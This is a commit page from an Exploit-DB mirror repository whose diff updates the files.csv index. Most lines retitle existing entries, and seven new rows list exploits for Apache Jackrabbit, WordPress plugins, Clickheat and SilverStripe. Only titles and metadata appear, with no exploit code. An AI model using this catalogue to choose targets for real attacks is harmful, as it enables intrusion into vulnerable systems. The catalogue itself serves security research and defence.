bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-27

Browse source 
15 new exploits
This commit is contained in:
Offensive Security 2015-05-27 05:02:00 +00:00
parent 132b3784f2
commit 8a28155962
20 changed files with 3115 additions and 2181 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
files.csv
View file

@ -135,7 +135,7 @@ id,file,description,date,author,platform,type,port
138,platforms/php/webapps/138.pl,"PHP-NUKE <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0
141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0
142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
@ -1162,7 +1162,7 @@ id,file,description,date,author,platform,type,port
1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0
1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0
1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0
1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0
1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0
1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0
1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0
1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0
@ -3245,7 +3245,7 @@ id,file,description,date,author,platform,type,port
3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0
3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0
3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit",2007-03-27,"Robert Swiecki",linux,local,0
3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0
3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0
3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (meta)",2007-03-27,skillTube,windows,remote,80
3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0
@ -3253,7 +3253,7 @@ id,file,description,date,author,platform,type,port
3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0
3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0
3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0
3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0
3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0
3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability",2007-03-28,GoLd_M,php,webapps,0
3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0
3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability",2007-03-28,kezzap66345,php,webapps,0
@ -8062,7 +8062,7 @@ id,file,description,date,author,platform,type,port
8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0
8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80
8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure Vulnerability",2009-04-27,SirGod,php,webapps,0
8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0
8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0
8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0
@ -8835,7 +8835,7 @@ id,file,description,date,author,platform,type,port
9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - (.PLF) Universal BoF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0
9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0
9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0
9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0
9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0
9364,platforms/windows/local/9364.py,"Tuniac 090517c - (.m3u ) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0
9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0
@ -12790,7 +12790,7 @@ id,file,description,date,author,platform,type,port
14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0
14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0
@ -21147,7 +21147,7 @@ id,file,description,date,author,platform,type,port
23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service Vulnerability",2004-04-09,"Donato Ferrante",linux,dos,0
23944,platforms/windows/dos/23944.php,"Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0
23945,platforms/unix/dos/23945.txt,"Ettercap <= 0.7.5.1 - Stack Overflow Vulnerability",2013-01-07,"Sajjad Pourali",unix,dos,0
23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0
23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0
23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 tiki-switch_theme.php theme Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 img/wiki_up Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0
23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 tiki-map.phtml Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0
@ -21240,7 +21240,7 @@ id,file,description,date,author,platform,type,port
24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection Vulnerability",2004-04-22,shr3kst3r,multiple,remote,0
24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0
24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0
24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0
24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0
@ -21272,7 +21272,7 @@ id,file,description,date,author,platform,type,port
24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24076,platforms/windows/remote/24076.txt,"Sambar 5.x Open Proxy and Authentication Bypass Vulnerability",2003-01-30,"David Endler",windows,remote,0
24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability",2004-05-03,"Imperva Application Defense Center",windows,remote,0
24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0
24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0
24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String Vulnerability",2004-05-03,"Nilanjan De",linux,remote,0
24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0
24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0
@ -21855,7 +21855,7 @@ id,file,description,date,author,platform,type,port
24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0
24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0
24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0
24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0
24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0
24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0
@ -22429,10 +22429,10 @@ id,file,description,date,author,platform,type,port
25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection Vulnerability",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0
25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting Vulnerability",2005-03-26,Dcrab,php,webapps,0
25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability",2005-03-26,Dcrab,php,webapps,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0
25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0
25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0
25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0
25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0
25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0
25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0
25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow Vulnerability",2005-03-28,"Luigi Auriemma",multiple,remote,0
25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0
25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
@ -22852,7 +22852,7 @@ id,file,description,date,author,platform,type,port
25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.PHP Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0
25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection Vulnerability",2005-05-25,Romty,asp,webapps,0
25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow Vulnerability",2004-08-10,infamous41md,linux,remote,0
25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
@ -23397,7 +23397,7 @@ id,file,description,date,author,platform,type,port
26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0
26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0
26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0
26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0
26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0
26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0
26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0
26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0
@ -24573,7 +24573,7 @@ id,file,description,date,author,platform,type,port
27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x.2.5.x/2.6.x Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.PHP SQL Injection Vulnerability",2003-03-23,r0t,php,webapps,0
27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting Vulnerability",2006-03-23,anonymous,jsp,webapps,0
27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability",2006-03-24,kspecial,cgi,webapps,0
@ -24872,10 +24872,10 @@ id,file,description,date,author,platform,type,port
27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0
27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow Vulnerability",2006-04-28,"Tavis Ormandy",linux,dos,0
27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption Vulnerability",2008-04-28,"Tavis Ormandy",linux,dos,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0
27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0
27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0
27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80
27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0
@ -26931,7 +26931,7 @@ id,file,description,date,author,platform,type,port
29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.PHP SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0
29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0
29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0
29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.PHP Cross-Site Scripting Vulnerability",2007-04-10,hackberry,php,webapps,0
@ -30640,7 +30640,7 @@ id,file,description,date,author,platform,type,port
33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0
33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0
34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
@ -32281,7 +32281,7 @@ id,file,description,date,author,platform,type,port
35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80
@ -32424,7 +32424,7 @@ id,file,description,date,author,platform,type,port
35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0
35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0
35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
@ -33489,3 +33489,18 @@ id,file,description,date,author,platform,type,port
37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80
37110,platforms/java/webapps/37110.py,"Apache Jackrabbit WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080
37111,platforms/php/webapps/37111.txt,"Wordpress MailChimp Subscribe Forms 1.1 Remote Code Execution",2015-05-26,woodspeed,php,webapps,80
37112,platforms/php/webapps/37112.txt,"Wordpress church_admin Plugin 0.800 Stored XSS",2015-05-26,woodspeed,php,webapps,80
37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
37114,platforms/jsp/webapps/37114.txt,"Sendio ESP Information Disclosure Vulnerability",2015-05-26,"Core Security",jsp,webapps,80
37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0
37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection Vulnerability",2012-04-27,"Mehmet Ince",php,webapps,0
